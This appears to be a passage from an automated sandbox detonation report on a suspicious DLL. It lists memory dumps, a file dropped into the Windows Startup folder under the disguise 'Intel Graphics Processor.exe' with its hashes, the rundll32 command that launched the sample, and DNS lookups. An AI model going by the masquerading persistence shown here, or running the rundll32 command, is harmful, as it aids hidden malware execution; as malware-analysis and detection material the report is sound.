memory/5064-1515-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5064-1516-0x0000020E28120000-0x0000020E28140000-memory.dmp

memory/5064-1514-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5064-1512-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5064-1511-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5064-1518-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5064-1519-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5064-1521-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5064-1517-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5064-1520-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5064-1525-0x0000000140000000-0x0000000140848000-memory.dmp

memory/5064-1527-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1384-1528-0x0000000000FA0000-0x0000000000FAE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe

MD5 b89d4c3a816d27a374df838b682320ad
SHA1 3d2549ad4a459c23f1cb787a8be96171a3dacf1a
SHA256 0fb559fa4b75744a915bc4d9dc0dd7b448f4c41acfe6b0d3eba5b9a1b01812b6
SHA512 9b52f91f26249a4ec0dbfa506079e85197d093c39913ff3b47034465a16fb95ae754b361385c479174e18c8551a35b74e88237f3178ebf2fcc650525a592bd34

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-12 05:27

Reported

2024-06-12 05:58

Platform

win10-20240404-en

Max time kernel

315s

Max time network

1608s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Nexus Release\assets.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Nexus Release\assets.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A